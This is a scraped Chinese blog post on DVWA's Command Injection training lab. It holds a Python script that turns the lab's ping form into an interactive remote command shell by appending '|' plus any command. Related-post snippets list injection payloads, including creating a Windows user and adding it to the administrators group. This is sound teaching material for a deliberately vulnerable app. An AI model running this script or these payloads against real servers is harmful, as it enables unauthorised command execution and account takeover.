dvwa——Command Injection初级、中级和高级python脚本解法(一)

已于 2022-02-09 14:44:10 修改
阅读量765 收藏 6
点赞数 13
CC 4.0 BY-SA版权
分类专栏: 靶场攻防 文章标签: python 开发语言 后端
于 2022-01-23 22:39:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-NC-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaofengdada/article/details/122658583
本文介绍如何利用Python的requests和BeautifulSoup库来演示DVWA平台上的命令执行漏洞。通过发送POST请求并解析返回的HTML内容,可以实现远程执行命令并获取结果。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

输入127.0.0.1命令,查看DVWA的command execute页面的源代码,如下图所示:

 通过查询得知pre是唯一的,因此需要将返回页面中的pre标签提取出来,最为方便的是使用BeautifulSoup模块,这个模块的主要功能是解析并提取网页中的数据。

python爬虫——Beautiful Soup库(数据解析)详细说明_xiaofengdada的博客-CSDN博客

python爬虫——request模块(一)_xiaofengdada的博客-CSDN博客_python request

话不多说,直接上源码,不懂参考上面博客:

import requests
#import json
from bs4 import BeautifulSoup
while True:
    cmd = input("请输入您要执行的命令行:").strip()
    #if len(cmd) == 0:
        #continue
    if cmd == 'quit':
        break
    header = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0',
        'Cookie':'security=medium; PHPSESSID=9fvvn8hc6iq55cs3vgbpahvoj0'
    }
    url = "http://x.x.x.x/dvwa/vulnerabilities/exec/#"
    data = {
        'ip':'127.0.0.1 |%s'%cmd,
        'Submit':'Submit'
    }
    res = requests.post(url=url,headers=header,data=data)
    #print(res.text)
    marry =BeautifulSoup(res.text,'lxml')
    for pre in marry.find_all(name='pre'):
        print(pre.string)

输出结果:

初级和高级的只要把请求头里面的security设置为low和high即可!

dvwa学习之命令注入(command injection
caption88的博客
01-10 311
首先你可能会遇见ping个ip后出现乱码的情况,那就是在DVWA-master\dvwa\includes目录下的到dvwaPage.inc.php文件中设置的字体是utf-8,解决方法把所有的”charset=utf-8”,修改”charset=gb2312”。(真实情况,俺遇见解决了回来改)。 学习命令注入,首先去看high等级的源码。因为你会发现,低级中级只是使用的符号不样。如...
DVWACommand Injection通关(低中高)
LIU6636LIU的博客
07-13 574
DVWACommand Injection通关(低中高)
DVWA学习之Command Injection命令行注入(python脚本实现)
qq_31426383的博客
12-01 361
DVWA学习之Command Injection命令行注入概述 概述 搭建方法请转至 DVMA学习之安装、环境搭建等。 Brute Force请转至 DVWA学习之Brute Force暴力破解(python脚本实现) 本部分先张贴别人的博客(仅讲解,无脚本实现),后续再贴自己写的 python 脚本。 https://www.cnblogs.com/jojo-feed/p/10172770.html ...
DVWA靶场通关】CSRF漏洞实验(初级
【安歌er】的博客
06-23 309
DVWA-CSRF漏洞实验(初级
DVWA系列】二、Command Injection 命令注入(源码分析&python脚本实现&漏洞利用获取shell)
Pluto.的博客
03-12 1059
文章目录DVWACommand Injection 命令注入- 前言、low级别二、medium级别三、high级别四、impossible级别五、漏洞利用- 获取目标shell DVWA Command Injection 命令注入 - 前言 命令拼接符:命令注入漏洞的利用,离不开命令拼接符 a & b: a、b命令互不影响,各自执行; a && b: a命令执行成功后,才会执行b命令; a | b:a命令的输出作为 b 的输入(a命令不论真假都会执行b命令); a || b
DVWA--Command Injection(命令执行)--四个等级
1stPeak's Blog
10-29 4873
Command Injection,也就是我们常说的命令执行,DVWA共有四个等级 索引目录 Low Medium High Impossible Low 源代码: <?php if( isset( $_POST[ 'Submit' ] ) ) { // Check Anti-CSRF token checkTok...
DVWACommand Injection(命令注入)
RexHa的博客
09-29 1313
DVWA 之 命令注入三个等级通关
Python3针对Command Injection命令执行漏洞的DVWA靶场Exp编写实战指南
10-27
本文档详细讲解了使用Python3在DVWA(Damn Vulnerable Web Application)平台进行Command Injection漏洞利用程序(Exploit)的编写步骤,涵盖了基本的概念解释、环境搭建、攻击向量的选择与实现、具体脚本编写等方面...
dvwa靶场:Command Injection系列】【命令执行】Command Injection低-中-高级别,通关啦
m0_47484034的博客
11-25 301
dvwa靶场:Command Injection系列】【命令执行】Command Injection低-中-高级别,通关啦
DVWA靶场 Command Injection
SELF_REDEEM的博客
08-04 422
环境说明 DVWA靶场使用phpStudy2016+Windows7搭建,其中Windows7使用的是虚拟机,并设置桥接模式与宿主机可以相互通信。 漏洞发掘 Low DVWA靶场之Command Injection,首先我们设置靶场的安全等级为Low,然后查看靶场的界面,可以看到这是个Ping IP地址的页面,我们随便找个域名,先在本地Ping并测试下 我们可以看到本地Ping通了IP地址14.215.177.82,我们将使用这个IP地址进行相关的测试,我们在DVWA的网站中填入这个IP
DVWA——SQL Injection(Blind)【详细的步骤实现(图解)包含多种盲注方法并且附上了payload】
weixin_46709219的博客
01-04 923
)区别: SQL盲注与般注入的区别在于般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。 二)思想: 在盲注中,页面无论对错都只会以 “是” 或者 “不是”来对我们的SQL语句进行结果的反馈,因此我们需要构造payload去询问例如“数据库名字的第个字母是不是a?”,通过问答的方式最终获取我们想要的数据。 三)盲注分为基于布尔盲注、基于
DVWA中命令执行(Command Injection
qq_43452198的博客
04-23 411
Command Injectionlowmediumhighimpossible 命令注入攻击的常见模式为:仅仅需要输入数据的场合,却伴随着数据同时输入了恶意代码,而装载数据的系统对此并未设计良好的过滤过程,导致恶意代码也并执行,最终导致信息泄露或者正常数据的破坏。 low <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get inp...
DVWACommand Execution
GVFDBDF的专栏
09-05 1647
1、源码审计(LOW级别) if( isset( $_POST[ 'submit' ] ) ) {     $target = $_REQUEST[ 'ip' ];     // Determine OS and execute the ping command.     if (stristr(php_uname('s'), 'Windows NT')) {
【代码审计】dvwa命令执行漏洞的代码(高级
wj33333的博客
11-21 773
代码审计
DVWA高级模式 ---- 命令执行代码审计
认真走好每一小步
06-17 276
认真走好每小步请多多指教。
DVWA中的Command Injection(命令执行)
hwy2506451901的博客
04-04 272
常用url编码:%20=空格,%5c=\,%26=&,%7c=| A & B:不管A执行成功与否,都会执行B(将上个命令的输入作为下个命令的输入) A && B:先执行A成功后执行B A | B:只执行B A || B:A失败再执行B(A成功则不执行B) (1) low:没有过滤 127.0.0.1 则可以成功 (2)medium:过滤了&&,;...
DVWA闯关Command Execution
LainWith的博客
08-07 855
高中低难度低级难度中等难度高级难度不可能难度 低级难度 首先看下题目,说的是让我们输入个IP,它会发起ping包,确实如此。 再来查看下源代码 <?php if( isset( $_POST[ 'submit' ] ) ) { $target = $_REQUEST[ 'ip' ]; if (stristr(php_uname('s'), 'Windows NT')) { $cmd = shell_exec( 'ping ' . $target );
dvwa实战第二篇:Command Injection
爱未央的博客
05-10 543
最近被编译原理搞得神魂颠倒,没时间更新dvwa… 今天写dvwa的第二篇:command injection命令注入。 在开始之前,先对centos进行设置:关闭selinux。 (我看到很多教程好像都没有提到关闭selinux,实测在没有关闭的情况下,命令注入后没有反馈,centos7给出警告如下: 因此首先需要关闭selinux,具体操作如下: centos 7 终端输入vim /etc/sysconfig/selinux,将SELINUX=enforcing改为SELINUX=disabled,保存
dvwa通关(初级
weixin_63154145的博客
02-07 295
dvwa通关(初级
dvwa靶场command injection
最新发布
07-08
<think>首先,用户的问题是关于DVWA中的命令注入漏洞测试。用户提到:“我想用户意图是在使用DVWA靶场时尝试进行命令注入(Command Injection)攻击,可能是为了测试或学习安全漏洞利用方法。” 所以,我需要提供关于如何在DVWA中测试命令注入漏洞的指导。 回顾系统级指令: - 所有行内数学表达式必须使用$...$格式。 - 独立公式必须使用$$...$$格式并单独成段。 - LaTeX语法正确。 - 使用中文回答。 - 生成相关问题。 - 回答中引用的段落末尾自然地添加引用标识。 - 回答结构清晰,帮助用户逐步解决问题。 - 引用站内引用:引用[1]是关于DVWA的CSRF教程,引用[2]是关于命令注入的笔记。这些引用是提供的参考,我需要尽可能参考用户的问题我的回答。 用户的问题具体是:“请问DVWA command injection vulnerability test”,所以我应该直接回答如何测试命令注入漏洞。 结构化回答: 1. **引言**:解释命令注入漏洞是什么,以及它在DVWA中的位置。 2. **步骤**:逐步指导如何在DVWA中测试命令注入漏洞。 3. **示例**:提供些命令注入的示例代码或命令。 4. **安全提示**:提醒用户在测试时注意安全,因为这是在学习环境中。 5. **生成相关问题**:在末尾添加相关问题。 引用处理: - 在回答中,如果引用到提供的引用内容,需要添加引用标识。例如,提到DVWA模块时引用[^1],提到命令注入语句时引用[^2]。 - 引用[1]:DVWA模块包括命令注入。 - 引用[2]:给出了具体的命令注入语句。 回答必须使用中文。 生成相关问题: - 在末尾添加“相关问题”部分,列出2-3个相关问题。 确保LaTeX使用正确: - 用户的问题中没有数学表达式,所以可能不需要。但如果涉及公式,比如在解释漏洞时,可能需要使用。但DVWA命令注入主要是文本命令,可能不需要数学公式。所以,我可以避免使用,除非必要。 内容大纲: 1. **介绍命令注入漏洞**:简要解释什么是命令注入,以及为什么在DVWA中测试它。 - 引用[^1]:DVWA有命令注入模块。 2. **设置DVWA**:如果需要,简述如何设置DVWA环境(但用户可能已经设置好)。 3. **测试步骤**: - 访问命令注入模块。 - 输入示例命令进行注入。 - 展示结果。 - 提供示例命令,如引用[^2]中的。 4. **示例代码**:可能不需要代码块,因为命令注入是输入命令,而不是代码。但可以展示输入示例。 5. **安全注意事项**:强调只在授权环境中测试。 6. **相关问题**:生成相关问题。 相关问题想法: 1. 如何防止命令注入漏洞? 2. DVWA中其他漏洞的测试方法? 3. 命令注入漏洞的常见利用场景? 最终回答结构: - 开头:直接回答问题。 - 主体:逐步指导。 - 结尾:相关问题。</think>### DVWA命令注入漏洞测试指南 命令注入(Command Injection)漏洞允许攻击者通过输入字段执行任意系统命令,这可能导致服务器被完全控制。在DVWA(Damn Vulnerable Web Application)中,Command Injection模块专门设计用于学习测试这种漏洞[^1]。下面我将逐步指导您如何在DVWA中安全地进行命令注入漏洞测试。整个过程基于DVWA的低安全级别(Low Security Level),确保操作简单易懂。测试前,请确保您已在本地或隔离环境中部署DVWA,避免对真实系统造成风险。 #### 步骤1: 设置DVWA环境 1. **登录DVWA**:访问您的DVWA实例(例如 `http://localhost/dvwa`),使用默认凭据登录(用户名:`admin`,密码:`password`)。 2. **调整安全级别**:在DVWA左侧菜单中,进入“DVWA Security”,将安全级别设为“Low”。这简化了测试,因为低级别未对输入进行过滤。 3. **进入命令注入模块**:导航到“Command Injection”模块(位于DVWA主菜单中)。您会看到个表单,提示输入IP地址进行ping测试[^1]。 #### 步骤2: 执行命令注入测试 命令注入的原理是通过输入字段注入额外命令。DVWA的表单设计为ping个IP地址,但我们可以添加特殊字符(如`|`、`&`或`;`)来串联其他命令。以下是关键测试方法: - **基础注入**:在输入框中输入个合法IP地址(如`127.0.0.1`),后接管道符`|`额外命令。例如: - 输入:`127.0.0.1 | whoami` 这将执行ping命令后运行`whoami`(显示当前用户),输出结果会显示在页面上,例如: ``` PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.05 ms ...(ping输出)... root # whoami命令的输出 ``` 这确认漏洞存在,因为用户命令被成功执行。 - **进阶注入**:使用更复杂的命令来测试系统权限或创建用户。参考常见注入语句[^2]: - 输入:`127.0.0.1 | net user` 列出系统用户,检查服务器权限。 - 输入:`127.0.0.1 | net user test 123 /add` 尝试添加新用户(用户名为`test`,密码`123`),成功后可在系统中验证。 - 输入:`127.0.0.1 | net localgroup administrators test /add` 将用户`test`提升为管理员组(仅在高权限环境有效)。 **关键技巧**: - 使用`&&`或`;`确保命令顺序执行(例如`127.0.0.1 ; ls` 列出目录)。 - 在Windows系统中,命令可能需调整(如用`dir`代替`ls`)。 - 如果输出被截断,尝试重定向到文件(如`127.0.0.1 | echo "test" > output.txt`)。 #### 步骤3: 分析结果风险 - **漏洞确认**:如果额外命令的输出显示在页面上,说明注入成功。这暴露了服务器未对用户输入进行过滤的风险。 - **安全注意事项**: - 仅在本地或虚拟环境中测试,避免非法入侵。 - 在DVWA的高安全级别下,测试会失败(因为输入被消毒),这有助于学习防御机制。 - 测试后,恢复DVWA状态(例如删除添加的用户)。 命令注入漏洞源于应用程序未对用户输入进行转义或验证,常见于Web表单调用系统命令的场景[^2]。通过DVWA的测试,您可以深入理解漏洞原理,并为实际防御提供基础。 #### 相关问题 1. 如何防止命令注入漏洞在Web应用中出现? 2. DVWA中文件上传(File Upload)漏洞的测试方法是什么? 3. 命令注入漏洞在真实网络攻击中有哪些典型案例? [^1]: DVWA包含多个模块,如Command Injection,用于安全学习。引用来源:新手指南:DVWA全级别教程之CSRF。 [^2]: 命令注入语句示例,如`net user`操作。引用来源:DVWA笔记(二)Command Injection(命令注入)。
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaochuhe--kaishui

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值